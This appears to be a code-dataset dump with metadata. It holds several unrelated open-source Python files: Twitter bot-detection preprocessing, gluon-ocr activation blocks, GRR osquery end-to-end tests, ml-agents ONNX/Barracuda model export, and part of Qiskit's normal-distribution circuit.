statuses_count=torch.load(path+"statuses_count.pt") active_days=pd.Series(active_days.to('cpu').detach().numpy()) active_days=(active_days-active_days.mean())/active_days.std() active_days=torch.tensor(np.array(active_days)) screen_name_length=pd.Series(screen_name_length.to('cpu').detach().numpy()) screen_name_length_days=(screen_name_length-screen_name_length.mean())/screen_name_length.std() screen_name_length_days=torch.tensor(np.array(screen_name_length_days)) favourites_count=pd.Series(favourites_count.to('cpu').detach().numpy()) favourites_count=(favourites_count-favourites_count.mean())/favourites_count.std() favourites_count=torch.tensor(np.array(favourites_count)) followers_count=pd.Series(followers_count.to('cpu').detach().numpy()) followers_count=(followers_count-followers_count.mean())/followers_count.std() followers_count=torch.tensor(np.array(followers_count)) friends_count=pd.Series(friends_count.to('cpu').detach().numpy()) friends_count=(friends_count-friends_count.mean())/friends_count.std() friends_count=torch.tensor(np.array(friends_count)) statuses_count=pd.Series(statuses_count.to('cpu').detach().numpy()) statuses_count=(statuses_count-statuses_count.mean())/statuses_count.std() statuses_count=torch.tensor(np.array(statuses_count)) num_prop=torch.cat((followers_count.reshape([229580,1]),friends_count.reshape([229580,1]),favourites_count.reshape([229580,1]),statuses_count.reshape([229580,1]),screen_name_length_days.reshape([229580,1]),active_days.reshape([229580,1])),1).to(self.device) if self.save: torch.save(num_prop,"./Data/num_prop.pt") else: num_prop=torch.load(self.root+"num_prop.pt").to(self.device) print('Finished') return num_prop def cat_prop_preprocess(self): print('Processing feature4...',end=' ') path=self.root+'category_properties.pt' if not os.path.exists(path): category_properties=[] properties=['protected','geo_enabled','verified','contributors_enabled','is_translator','is_translation_enabled','profile_background_tile','profile_use_background_image','has_extended_profile','default_profile','default_profile_image'] for i in range (self.df_data.shape[0]): prop=[] if self.df_data['profile'][i] is None: for i in range(11): prop.append(0) else: for each in properties: if self.df_data['profile'][i][each] is None: prop.append(0) else: if self.df_data['profile'][i][each] == "True ": prop.append(1) else: prop.append(0) prop=np.array(prop) category_properties.append(prop) category_properties=torch.tensor(np.array(category_properties,dtype=np.float32)).to(self.device) if self.save: torch.save(category_properties,self.root+'category_properties.pt') else: category_properties=torch.load(self.root+"category_properties.pt").to(self.device) print('Finished') return category_properties def Build_Graph(self): print('Building graph',end=' ') path=self.root+'edge_index.pt' if not os.path.exists(path): id2index_dict={id:index for index,id in enumerate(self.df_data['ID'])} edge_index=[] edge_type=[] for i,relation in enumerate(self.df_data['neighbor']): if relation is not None: for each_id in relation['following']: try: target_id=id2index_dict[int(each_id)] except KeyError: continue else: edge_index.append([i,target_id]) edge_type.append(0) for each_id in relation['follower']: try: target_id=id2index_dict[int(each_id)] except KeyError: continue else: edge_index.append([i,target_id]) edge_type.append(1) else: continue edge_index=torch.tensor(edge_index,dtype=torch.long).t().contiguous().to(self.device) edge_type=torch.tensor(edge_type,dtype=torch.long).to(self.device) if self.save: torch.save(edge_index,self.root+"edge_index.pt") torch.save(edge_type,self.root+"edge_type.pt") else: edge_index=torch.load(self.root+"edge_index.pt").to(self.device) edge_type=torch.load(self.root+"edge_type.pt").to(self.device) print('Finished') return edge_index,edge_type def train_val_test_mask(self): train_idx=range(8278) val_idx=range(8278,8278+2365) test_idx=range(8278+2365,8278+2365+1183) return train_idx,val_idx,test_idx def dataloader(self): labels=self.load_labels() self.Des_Preprocess() des_tensor=self.Des_embbeding() self.tweets_preprocess() tweets_tensor=self.tweets_embedding() num_prop=self.num_prop_preprocess() category_prop=self.cat_prop_preprocess() edge_index,edge_type=self.Build_Graph() train_idx,val_idx,test_idx=self.train_val_test_mask() return des_tensor,tweets_tensor,num_prop,category_prop,edge_index,edge_type,labels,train_idx,val_idx,test_idx
none
1
2.48024
2
gluonocr/nn/block.py
Davids929/gluon-ocr
2
6627895
<filename>gluonocr/nn/block.py # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """Building blocks and utility for models.""" __all__ = ['L2Normalization', 'GELU'] import math from mxnet import ndarray from mxnet.gluon import Block, HybridBlock class L2Normalization(HybridBlock): """Normalize the input array by dividing the L2 norm along the given axis. ..code out = data / (sqrt(sum(data**2, axis)) + eps) Parameters ---------- axis : int, default -1 The axis to compute the norm value. eps : float, default 1E-6 The epsilon value to avoid dividing zero """ def __init__(self, axis=-1, eps=1E-6, **kwargs): super(L2Normalization, self).__init__(**kwargs) self._axis = axis self._eps = eps def hybrid_forward(self, F, x): # pylint: disable=arguments-differ ret = F.broadcast_div(x, F.norm(x, axis=self._axis, keepdims=True) + self._eps) return ret class GELU(HybridBlock): """Gaussian Error Linear Unit. This is a smoother version of the RELU. https://arxiv.org/abs/1606.08415 Parameters ---------- approximate : bool, default False If True, use tanh approximation to calculate gelu. If False, use erf. """ def __init__(self, approximate=False, prefix=None, params=None): super().__init__(prefix=prefix, params=params) self._approximate = approximate def hybrid_forward(self, F, x): # pylint: disable=arguments-differ """ Parameters ---------- Inputs: - **data**: input tensor with arbitrary shape. Outputs: - **out**: output tensor with the same shape as `data`. """ if not self._approximate: return F.LeakyReLU(x, act_type='gelu') else: return 0.5 * x * (1 + F.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * (x ** 3)))) def __repr__(self): s = '{name}()' return s.format(name=self.__class__.__name__)
<filename>gluonocr/nn/block.py # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """Building blocks and utility for models.""" __all__ = ['L2Normalization', 'GELU'] import math from mxnet import ndarray from mxnet.gluon import Block, HybridBlock class L2Normalization(HybridBlock): """Normalize the input array by dividing the L2 norm along the given axis. ..code out = data / (sqrt(sum(data**2, axis)) + eps) Parameters ---------- axis : int, default -1 The axis to compute the norm value. eps : float, default 1E-6 The epsilon value to avoid dividing zero """ def __init__(self, axis=-1, eps=1E-6, **kwargs): super(L2Normalization, self).__init__(**kwargs) self._axis = axis self._eps = eps def hybrid_forward(self, F, x): # pylint: disable=arguments-differ ret = F.broadcast_div(x, F.norm(x, axis=self._axis, keepdims=True) + self._eps) return ret class GELU(HybridBlock): """Gaussian Error Linear Unit. This is a smoother version of the RELU. https://arxiv.org/abs/1606.08415 Parameters ---------- approximate : bool, default False If True, use tanh approximation to calculate gelu. If False, use erf. """ def __init__(self, approximate=False, prefix=None, params=None): super().__init__(prefix=prefix, params=params) self._approximate = approximate def hybrid_forward(self, F, x): # pylint: disable=arguments-differ """ Parameters ---------- Inputs: - **data**: input tensor with arbitrary shape. Outputs: - **out**: output tensor with the same shape as `data`. """ if not self._approximate: return F.LeakyReLU(x, act_type='gelu') else: return 0.5 * x * (1 + F.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * (x ** 3)))) def __repr__(self): s = '{name}()' return s.format(name=self.__class__.__name__)
en
0.725487
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. Building blocks and utility for models. Normalize the input array by dividing the L2 norm along the given axis. ..code out = data / (sqrt(sum(data**2, axis)) + eps) Parameters ---------- axis : int, default -1 The axis to compute the norm value. eps : float, default 1E-6 The epsilon value to avoid dividing zero # pylint: disable=arguments-differ Gaussian Error Linear Unit. This is a smoother version of the RELU. https://arxiv.org/abs/1606.08415 Parameters ---------- approximate : bool, default False If True, use tanh approximation to calculate gelu. If False, use erf. # pylint: disable=arguments-differ Parameters ---------- Inputs: - **data**: input tensor with arbitrary shape. Outputs: - **out**: output tensor with the same shape as `data`.
2.313449
2
grr/test/grr_response_test/end_to_end_tests/tests/osquery.py
tsehori/grr
1
6627896
#!/usr/bin/env python """E2E tests for the osquery flow.""" from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals from grr_response_test.end_to_end_tests import test_base class TestOsquery(test_base.EndToEndTest): """Class with generic osquery tests runnable on every platform.""" MANUAL = True platforms = test_base.EndToEndTest.Platform.ALL def testOsVersion(self): args = self.grr_api.types.CreateFlowArgs("OsqueryFlow") args.query = """SELECT name FROM os_version;""" args.ignore_stderr_errors = True # Windows client prints spurious warnings. flow = self.RunFlowAndWait("OsqueryFlow", args=args) results = list(flow.ListResults()) self.assertLen(results, 1) table = results[0].payload.table self.assertEqual(table.query, args.query) self.assertLen(table.header.columns, 1) self.assertEqual(table.header.columns[0].name, "name") self.assertLen(table.rows, 1) self.assertLen(table.rows[0].values, 1) os_name = table.rows[0].values[0] if self.platform == test_base.EndToEndTest.Platform.DARWIN: self.assertEqual(os_name, "Mac OS X") elif self.platform == test_base.EndToEndTest.Platform.LINUX: # e.g. for Debian it is 'Debian GNU/Linux'. self.assertIn("Linux", os_name) elif self.platform == test_base.EndToEndTest.Platform.WINDOWS: # e.g. 'Microsoft Windows 10 Enterprise' self.assertIn("Windows", os_name) else: self.fail("Unexpected platform: {}".format(self.platform)) def testProcesses(self): args = self.grr_api.types.CreateFlowArgs("OsqueryFlow") args.query = """ SELECT path FROM osquery_info JOIN processes ON osquery_info.pid = processes.pid; """ args.ignore_stderr_errors = True # Windows client prints spurious warnings. flow = self.RunFlowAndWait("OsqueryFlow", args=args) results = list(flow.ListResults()) self.assertLen(results, 1) table = results[0].payload.table self.assertEqual(table.query, args.query) self.assertLen(table.header.columns, 1) self.assertEqual(table.header.columns[0].name, "path") self.assertLen(table.rows, 1) self.assertLen(table.rows[0].values, 1) # We are not sure about the path, but the executable should contain name # `osquery.exe` (e.g. on Windows we use `osqueryd` but on Linux and macOS we # use `osqueryi`. path = table.rows[0].values[0] self.assertIn("osquery", path)
#!/usr/bin/env python """E2E tests for the osquery flow.""" from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals from grr_response_test.end_to_end_tests import test_base class TestOsquery(test_base.EndToEndTest): """Class with generic osquery tests runnable on every platform.""" MANUAL = True platforms = test_base.EndToEndTest.Platform.ALL def testOsVersion(self): args = self.grr_api.types.CreateFlowArgs("OsqueryFlow") args.query = """SELECT name FROM os_version;""" args.ignore_stderr_errors = True # Windows client prints spurious warnings. flow = self.RunFlowAndWait("OsqueryFlow", args=args) results = list(flow.ListResults()) self.assertLen(results, 1) table = results[0].payload.table self.assertEqual(table.query, args.query) self.assertLen(table.header.columns, 1) self.assertEqual(table.header.columns[0].name, "name") self.assertLen(table.rows, 1) self.assertLen(table.rows[0].values, 1) os_name = table.rows[0].values[0] if self.platform == test_base.EndToEndTest.Platform.DARWIN: self.assertEqual(os_name, "Mac OS X") elif self.platform == test_base.EndToEndTest.Platform.LINUX: # e.g. for Debian it is 'Debian GNU/Linux'. self.assertIn("Linux", os_name) elif self.platform == test_base.EndToEndTest.Platform.WINDOWS: # e.g. 'Microsoft Windows 10 Enterprise' self.assertIn("Windows", os_name) else: self.fail("Unexpected platform: {}".format(self.platform)) def testProcesses(self): args = self.grr_api.types.CreateFlowArgs("OsqueryFlow") args.query = """ SELECT path FROM osquery_info JOIN processes ON osquery_info.pid = processes.pid; """ args.ignore_stderr_errors = True # Windows client prints spurious warnings. flow = self.RunFlowAndWait("OsqueryFlow", args=args) results = list(flow.ListResults()) self.assertLen(results, 1) table = results[0].payload.table self.assertEqual(table.query, args.query) self.assertLen(table.header.columns, 1) self.assertEqual(table.header.columns[0].name, "path") self.assertLen(table.rows, 1) self.assertLen(table.rows[0].values, 1) # We are not sure about the path, but the executable should contain name # `osquery.exe` (e.g. on Windows we use `osqueryd` but on Linux and macOS we # use `osqueryi`. path = table.rows[0].values[0] self.assertIn("osquery", path)
en
0.722945
#!/usr/bin/env python E2E tests for the osquery flow. Class with generic osquery tests runnable on every platform. SELECT name FROM os_version; # Windows client prints spurious warnings. # e.g. for Debian it is 'Debian GNU/Linux'. # e.g. 'Microsoft Windows 10 Enterprise' SELECT path FROM osquery_info JOIN processes ON osquery_info.pid = processes.pid; # Windows client prints spurious warnings. # We are not sure about the path, but the executable should contain name # `osquery.exe` (e.g. on Windows we use `osqueryd` but on Linux and macOS we # use `osqueryi`.
2.225316
2
ml-agents/mlagents/model_serialization.py
bobcy2015/ml-agents
1
6627897
<gh_stars>1-10 from distutils.util import strtobool import os from typing import Any, List, Set, NamedTuple from distutils.version import LooseVersion try: import onnx from tf2onnx.tfonnx import process_tf_graph, tf_optimize from tf2onnx import optimizer ONNX_EXPORT_ENABLED = True except ImportError: # Either onnx and tf2onnx not installed, or they're not compatible with the version of tensorflow ONNX_EXPORT_ENABLED = False pass from mlagents.tf_utils import tf from tensorflow.python.platform import gfile from tensorflow.python.framework import graph_util from mlagents_envs.logging_util import get_logger from mlagents.trainers import tensorflow_to_barracuda as tf2bc if LooseVersion(tf.__version__) < LooseVersion("1.12.0"): # ONNX is only tested on 1.12.0 and later ONNX_EXPORT_ENABLED = False logger = get_logger(__name__) POSSIBLE_INPUT_NODES = frozenset( [ "action_masks", "epsilon", "prev_action", "recurrent_in", "sequence_length", "vector_observation", ] ) POSSIBLE_OUTPUT_NODES = frozenset( ["action", "action_probs", "recurrent_out", "value_estimate"] ) MODEL_CONSTANTS = frozenset( [ "action_output_shape", "is_continuous_control", "memory_size", "version_number", "trainer_major_version", "trainer_minor_version", "trainer_patch_version", ] ) VISUAL_OBSERVATION_PREFIX = "visual_observation_" class SerializationSettings(NamedTuple): model_path: str brain_name: str convert_to_barracuda: bool = True convert_to_onnx: bool = True onnx_opset: int = 9 def export_policy_model( settings: SerializationSettings, graph: tf.Graph, sess: tf.Session ) -> None: """ Exports latest saved model to .nn format for Unity embedding. """ frozen_graph_def = _make_frozen_graph(settings, graph, sess) # Save frozen graph frozen_graph_def_path = settings.model_path + "/frozen_graph_def.pb" with gfile.GFile(frozen_graph_def_path, "wb") as f: f.write(frozen_graph_def.SerializeToString()) # Convert to barracuda if settings.convert_to_barracuda: tf2bc.convert(frozen_graph_def_path, settings.model_path + ".nn") logger.info(f"Exported {settings.model_path}.nn file") # Save to onnx too (if we were able to import it) if ONNX_EXPORT_ENABLED: if settings.convert_to_onnx: try: onnx_graph = convert_frozen_to_onnx(settings, frozen_graph_def) onnx_output_path = settings.model_path + ".onnx" with open(onnx_output_path, "wb") as f: f.write(onnx_graph.SerializeToString()) logger.info(f"Converting to {onnx_output_path}") except Exception: # Make conversion errors fatal depending on environment variables (only done during CI) if _enforce_onnx_conversion(): raise logger.exception( "Exception trying to save ONNX graph. Please report this error on " "https://github.com/Unity-Technologies/ml-agents/issues and " "attach a copy of frozen_graph_def.pb" ) else: if _enforce_onnx_conversion(): raise RuntimeError( "ONNX conversion enforced, but couldn't import dependencies." ) def _make_frozen_graph( settings: SerializationSettings, graph: tf.Graph, sess: tf.Session ) -> tf.GraphDef: with graph.as_default(): target_nodes = ",".join(_process_graph(settings, graph)) graph_def = graph.as_graph_def() output_graph_def = graph_util.convert_variables_to_constants( sess, graph_def, target_nodes.replace(" ", "").split(",") ) return output_graph_def def convert_frozen_to_onnx( settings: SerializationSettings, frozen_graph_def: tf.GraphDef ) -> Any: # This is basically https://github.com/onnx/tensorflow-onnx/blob/master/tf2onnx/convert.py # Some constants in the graph need to be read by the inference system. # These aren't used by the model anywhere, so trying to make sure they propagate # through conversion and import is a losing battle. Instead, save them now, # so that we can add them back later. constant_values = {} for n in frozen_graph_def.node: if n.name in MODEL_CONSTANTS: val = n.attr["value"].tensor.int_val[0] constant_values[n.name] = val inputs = _get_input_node_names(frozen_graph_def) outputs = _get_output_node_names(frozen_graph_def) logger.info(f"onnx export - inputs:{inputs} outputs:{outputs}") frozen_graph_def = tf_optimize( inputs, outputs, frozen_graph_def, fold_constant=True ) with tf.Graph().as_default() as tf_graph: tf.import_graph_def(frozen_graph_def, name="") with tf.Session(graph=tf_graph): g = process_tf_graph( tf_graph, input_names=inputs, output_names=outputs, opset=settings.onnx_opset, ) onnx_graph = optimizer.optimize_graph(g) model_proto = onnx_graph.make_model(settings.brain_name) # Save the constant values back the graph initializer. # This will ensure the importer gets them as global constants. constant_nodes = [] for k, v in constant_values.items(): constant_node = _make_onnx_node_for_constant(k, v) constant_nodes.append(constant_node) model_proto.graph.initializer.extend(constant_nodes) return model_proto def _make_onnx_node_for_constant(name: str, value: int) -> Any: tensor_value = onnx.TensorProto( data_type=onnx.TensorProto.INT32, name=name, int32_data=[value], dims=[1, 1, 1, 1], ) return tensor_value def _get_input_node_names(frozen_graph_def: Any) -> List[str]: """ Get the list of input node names from the graph. Names are suffixed with ":0" """ node_names = _get_frozen_graph_node_names(frozen_graph_def) input_names = node_names & POSSIBLE_INPUT_NODES # Check visual inputs sequentially, and exit as soon as we don't find one vis_index = 0 while True: vis_node_name = f"{VISUAL_OBSERVATION_PREFIX}{vis_index}" if vis_node_name in node_names: input_names.add(vis_node_name) else: break vis_index += 1 # Append the port return [f"{n}:0" for n in input_names] def _get_output_node_names(frozen_graph_def: Any) -> List[str]: """ Get the list of output node names from the graph. Names are suffixed with ":0" """ node_names = _get_frozen_graph_node_names(frozen_graph_def) output_names = node_names & POSSIBLE_OUTPUT_NODES # Append the port return [f"{n}:0" for n in output_names] def _get_frozen_graph_node_names(frozen_graph_def: Any) -> Set[str]: """ Get all the node names from the graph. """ names = set() for node in frozen_graph_def.node: names.add(node.name) return names def _process_graph(settings: SerializationSettings, graph: tf.Graph) -> List[str]: """ Gets the list of the output nodes present in the graph for inference :return: list of node names """ all_nodes = [x.name for x in graph.as_graph_def().node] nodes = [x for x in all_nodes if x in POSSIBLE_OUTPUT_NODES | MODEL_CONSTANTS] logger.info("List of nodes to export for brain :" + settings.brain_name) for n in nodes: logger.info("\t" + n) return nodes def _enforce_onnx_conversion() -> bool: env_var_name = "TEST_ENFORCE_ONNX_CONVERSION" if env_var_name not in os.environ: return False val = os.environ[env_var_name] try: # This handles e.g. "false" converting reasonably to False return strtobool(val) except Exception: return False
from distutils.util import strtobool import os from typing import Any, List, Set, NamedTuple from distutils.version import LooseVersion try: import onnx from tf2onnx.tfonnx import process_tf_graph, tf_optimize from tf2onnx import optimizer ONNX_EXPORT_ENABLED = True except ImportError: # Either onnx and tf2onnx not installed, or they're not compatible with the version of tensorflow ONNX_EXPORT_ENABLED = False pass from mlagents.tf_utils import tf from tensorflow.python.platform import gfile from tensorflow.python.framework import graph_util from mlagents_envs.logging_util import get_logger from mlagents.trainers import tensorflow_to_barracuda as tf2bc if LooseVersion(tf.__version__) < LooseVersion("1.12.0"): # ONNX is only tested on 1.12.0 and later ONNX_EXPORT_ENABLED = False logger = get_logger(__name__) POSSIBLE_INPUT_NODES = frozenset( [ "action_masks", "epsilon", "prev_action", "recurrent_in", "sequence_length", "vector_observation", ] ) POSSIBLE_OUTPUT_NODES = frozenset( ["action", "action_probs", "recurrent_out", "value_estimate"] ) MODEL_CONSTANTS = frozenset( [ "action_output_shape", "is_continuous_control", "memory_size", "version_number", "trainer_major_version", "trainer_minor_version", "trainer_patch_version", ] ) VISUAL_OBSERVATION_PREFIX = "visual_observation_" class SerializationSettings(NamedTuple): model_path: str brain_name: str convert_to_barracuda: bool = True convert_to_onnx: bool = True onnx_opset: int = 9 def export_policy_model( settings: SerializationSettings, graph: tf.Graph, sess: tf.Session ) -> None: """ Exports latest saved model to .nn format for Unity embedding. """ frozen_graph_def = _make_frozen_graph(settings, graph, sess) # Save frozen graph frozen_graph_def_path = settings.model_path + "/frozen_graph_def.pb" with gfile.GFile(frozen_graph_def_path, "wb") as f: f.write(frozen_graph_def.SerializeToString()) # Convert to barracuda if settings.convert_to_barracuda: tf2bc.convert(frozen_graph_def_path, settings.model_path + ".nn") logger.info(f"Exported {settings.model_path}.nn file") # Save to onnx too (if we were able to import it) if ONNX_EXPORT_ENABLED: if settings.convert_to_onnx: try: onnx_graph = convert_frozen_to_onnx(settings, frozen_graph_def) onnx_output_path = settings.model_path + ".onnx" with open(onnx_output_path, "wb") as f: f.write(onnx_graph.SerializeToString()) logger.info(f"Converting to {onnx_output_path}") except Exception: # Make conversion errors fatal depending on environment variables (only done during CI) if _enforce_onnx_conversion(): raise logger.exception( "Exception trying to save ONNX graph. Please report this error on " "https://github.com/Unity-Technologies/ml-agents/issues and " "attach a copy of frozen_graph_def.pb" ) else: if _enforce_onnx_conversion(): raise RuntimeError( "ONNX conversion enforced, but couldn't import dependencies." ) def _make_frozen_graph( settings: SerializationSettings, graph: tf.Graph, sess: tf.Session ) -> tf.GraphDef: with graph.as_default(): target_nodes = ",".join(_process_graph(settings, graph)) graph_def = graph.as_graph_def() output_graph_def = graph_util.convert_variables_to_constants( sess, graph_def, target_nodes.replace(" ", "").split(",") ) return output_graph_def def convert_frozen_to_onnx( settings: SerializationSettings, frozen_graph_def: tf.GraphDef ) -> Any: # This is basically https://github.com/onnx/tensorflow-onnx/blob/master/tf2onnx/convert.py # Some constants in the graph need to be read by the inference system. # These aren't used by the model anywhere, so trying to make sure they propagate # through conversion and import is a losing battle. Instead, save them now, # so that we can add them back later. constant_values = {} for n in frozen_graph_def.node: if n.name in MODEL_CONSTANTS: val = n.attr["value"].tensor.int_val[0] constant_values[n.name] = val inputs = _get_input_node_names(frozen_graph_def) outputs = _get_output_node_names(frozen_graph_def) logger.info(f"onnx export - inputs:{inputs} outputs:{outputs}") frozen_graph_def = tf_optimize( inputs, outputs, frozen_graph_def, fold_constant=True ) with tf.Graph().as_default() as tf_graph: tf.import_graph_def(frozen_graph_def, name="") with tf.Session(graph=tf_graph): g = process_tf_graph( tf_graph, input_names=inputs, output_names=outputs, opset=settings.onnx_opset, ) onnx_graph = optimizer.optimize_graph(g) model_proto = onnx_graph.make_model(settings.brain_name) # Save the constant values back the graph initializer. # This will ensure the importer gets them as global constants. constant_nodes = [] for k, v in constant_values.items(): constant_node = _make_onnx_node_for_constant(k, v) constant_nodes.append(constant_node) model_proto.graph.initializer.extend(constant_nodes) return model_proto def _make_onnx_node_for_constant(name: str, value: int) -> Any: tensor_value = onnx.TensorProto( data_type=onnx.TensorProto.INT32, name=name, int32_data=[value], dims=[1, 1, 1, 1], ) return tensor_value def _get_input_node_names(frozen_graph_def: Any) -> List[str]: """ Get the list of input node names from the graph. Names are suffixed with ":0" """ node_names = _get_frozen_graph_node_names(frozen_graph_def) input_names = node_names & POSSIBLE_INPUT_NODES # Check visual inputs sequentially, and exit as soon as we don't find one vis_index = 0 while True: vis_node_name = f"{VISUAL_OBSERVATION_PREFIX}{vis_index}" if vis_node_name in node_names: input_names.add(vis_node_name) else: break vis_index += 1 # Append the port return [f"{n}:0" for n in input_names] def _get_output_node_names(frozen_graph_def: Any) -> List[str]: """ Get the list of output node names from the graph. Names are suffixed with ":0" """ node_names = _get_frozen_graph_node_names(frozen_graph_def) output_names = node_names & POSSIBLE_OUTPUT_NODES # Append the port return [f"{n}:0" for n in output_names] def _get_frozen_graph_node_names(frozen_graph_def: Any) -> Set[str]: """ Get all the node names from the graph. """ names = set() for node in frozen_graph_def.node: names.add(node.name) return names def _process_graph(settings: SerializationSettings, graph: tf.Graph) -> List[str]: """ Gets the list of the output nodes present in the graph for inference :return: list of node names """ all_nodes = [x.name for x in graph.as_graph_def().node] nodes = [x for x in all_nodes if x in POSSIBLE_OUTPUT_NODES | MODEL_CONSTANTS] logger.info("List of nodes to export for brain :" + settings.brain_name) for n in nodes: logger.info("\t" + n) return nodes def _enforce_onnx_conversion() -> bool: env_var_name = "TEST_ENFORCE_ONNX_CONVERSION" if env_var_name not in os.environ: return False val = os.environ[env_var_name] try: # This handles e.g. "false" converting reasonably to False return strtobool(val) except Exception: return False
en
0.903528
# Either onnx and tf2onnx not installed, or they're not compatible with the version of tensorflow # ONNX is only tested on 1.12.0 and later Exports latest saved model to .nn format for Unity embedding. # Save frozen graph # Convert to barracuda # Save to onnx too (if we were able to import it) # Make conversion errors fatal depending on environment variables (only done during CI) # This is basically https://github.com/onnx/tensorflow-onnx/blob/master/tf2onnx/convert.py # Some constants in the graph need to be read by the inference system. # These aren't used by the model anywhere, so trying to make sure they propagate # through conversion and import is a losing battle. Instead, save them now, # so that we can add them back later. # Save the constant values back the graph initializer. # This will ensure the importer gets them as global constants. Get the list of input node names from the graph. Names are suffixed with ":0" # Check visual inputs sequentially, and exit as soon as we don't find one # Append the port Get the list of output node names from the graph. Names are suffixed with ":0" # Append the port Get all the node names from the graph. Gets the list of the output nodes present in the graph for inference :return: list of node names # This handles e.g. "false" converting reasonably to False
2.005637
2
qiskit/circuit/library/probability_distributions/normal.py
Elliot-Coupe/qiskit-terra
1
6627898
# This code is part of Qiskit. # # (C) Copyright IBM 2017, 2020. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """A circuit that encodes a discretized normal probability distribution in qubit amplitudes.""" from typing import Tuple, Union, List, Optional import warnings import numpy as np from qiskit.circuit import QuantumCircuit from qiskit.exceptions import QiskitError class NormalDistribution(QuantumCircuit): r"""A circuit to encode a discretized normal distribution in qubit amplitudes. The probability density function of the normal distribution is defined as .. math:: \mathbb{P}(X = x) = \frac{1}{\sqrt{2\pi\sigma^2}} e^{-\frac{(x - \mu)^2}{\sigma^2}} .. note:: The parameter ``sigma`` in this class equals the **variance**, :math:`\sigma^2` and not the standard deviation. This is for consistency with multivariate distributions, where the uppercase sigma, :math:`\Sigma`, is associated with the covariance. This circuit considers the discretized version of the normal distribution on ``2 ** num_qubits`` equidistant points, :math:`x_i`, truncated to ``bounds``. For a one-dimensional random variable, meaning `num_qubits` is a single integer, it applies the operation .. math:: \mathcal{P}_X |0\rangle^n = \sum_{i=0}^{2^n - 1} \sqrt{\mathbb{P}(x_i)} |i\rangle where :math:`n` is `num_qubits`. .. note:: The circuit loads the **square root** of the probabilities into the qubit amplitudes such that the sampling probability, which is the square of the amplitude, equals the probability of the distribution. In the multi-dimensional case, the distribution is defined as .. math:: \mathbb{P}(X = x) = \frac{\Sigma^{-1}}{\sqrt{2\pi}} e^{-\frac{(x - \mu)^2}{\Sigma}} where :math:`\Sigma` is the covariance. To specify a multivariate normal distribution, ``num_qubits`` is a list of integers, each specifying how many qubits are used to discretize the respective dimension. The arguments ``mu`` and ``sigma`` in this case are a vector and square matrix. If for instance, ``num_qubits = [2, 3]`` then ``mu`` is a 2d vector and ``sigma`` is the :math:`2 \times 2` covariance matrix. The first dimension is discretized using 2 qubits, hence on 4 points, and the second dimension on 3 qubits, hence 8 points. Therefore the random variable is discretized on :math:`4 \times 8 = 32` points. Since, in general, it is not yet known how to efficiently prepare the qubit amplitudes to represent a normal distribution, this class computes the expected amplitudes and then uses the ``QuantumCircuit.initialize`` method to construct the corresponding circuit. This circuit is for example used in amplitude estimation applications, such as finance [1, 2], where customer demand or the return of a portfolio could be modelled using a normal distribution. Examples: >>> circuit = NormalDistribution(3, mu=1, sigma=1, bounds=(0, 2)) >>> circuit.draw() ┌────────────────────────────────────────────────────────────────────────────┐ q_0: ┤0 ├ │ │ q_1: ┤1 initialize(0.30391,0.3435,0.37271,0.38824,0.38824,0.37271,0.3435,0.30391) ├ │ │ q_2: ┤2 ├ └────────────────────────────────────────────────────────────────────────────┘ >>> mu = [1, 0.9] >>> sigma = [[1, -0.2], [-0.2, 1]] >>> circuit = NormalDistribution([2, 3], mu, sigma) >>> circuit.num_qubits 5 >>> from qiskit import QuantumCircuit >>> mu = [1, 0.9] >>> sigma = [[1, -0.2], [-0.2, 1]] >>> bounds = [(0, 1), (-1, 1)] >>> p_x = NormalDistribution([2, 3], mu, sigma, bounds) >>> circuit = QuantumCircuit(6) >>> circuit.append(p_x, list(range(5))) >>> for i in range(5): ... circuit.cry(2 ** i, i, 5) >>> circuit.draw() ┌───────┐ q_0: ┤0 ├────■───────────────────────────────────────── │ │ │ q_1: ┤1 ├────┼────────■──────────────────────────────── │ │ │ │ q_2: ┤2 P(X) ├────┼────────┼────────■─────────────────────── │ │ │ │ │ q_3: ┤3 ├────┼────────┼────────┼────────■────────────── │ │ │ │ │ │ q_4: ┤4 ├────┼────────┼────────┼────────┼────────■───── └───────┘┌───┴───┐┌───┴───┐┌───┴───┐┌───┴───┐┌───┴────┐ q_5: ─────────┤ RY(1) ├┤ RY(2) ├┤ RY(4) ├┤ RY(8) ├┤ RY(16) ├ └───────┘└───────┘└───────┘└───────┘└────────┘ References: [1]: <NAME>., <NAME>., & <NAME>. (2020). Quantum-Enhanced Simulation-Based Optimization. `arXiv:2005.10780 <http://arxiv.org/abs/2005.10780>`_ [2]: <NAME>., & <NAME>. J. (2018). Quantum Risk Analysis. `arXiv:1806.06893 <http://arxiv.org/abs/1806.06893>`_ """ def __init__( self, num_qubits: Union[int, List[int]], mu: Optional[Union[float, List[float]]] = None, 